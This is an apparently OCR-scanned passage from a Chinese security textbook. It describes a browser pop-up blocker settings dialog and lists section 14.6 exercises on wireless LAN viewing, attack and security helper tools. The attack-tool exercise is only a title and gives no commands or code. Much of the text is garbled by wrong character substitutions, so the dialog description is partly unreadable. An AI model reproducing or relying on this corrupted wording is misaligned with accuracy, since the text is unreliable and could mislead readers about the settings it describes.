洋 出 窗口 阻止 程序 设 辣 x 


例外 


弹 寺 窗口 当前 已 流 阻 止 。 你 可 以 习 特 定 则 站 渗 加 下 雪 中 ， 从 而 允许 来 目 


! 。 该 让 点 的 弹出 乔 口 . 


要 亿 许 的 网 站 地 址 (W: 


通知 和 和 阳 止 级 别 ， 
阻止 弹出 窗口 时 援 放声 车 (P). 
胆 止 弛 寺 窗口 时 竺 示 渴 和 和 栏 (N). 
阳 止 恐 别 (B): 
中: 旧 止 关 宅 效 上 自动 津 出 否 口 v 


14.6 “小 试 身 手 


练习 1: 无 线 局 域 网 查看 工具 的 使 用 。 

练习 2: 无 线 局 域 网 攻击 工具 的 使 用 。 

练习 3: 无 线 局 域 网 安全 辅助 工具 的 
使 用 。 


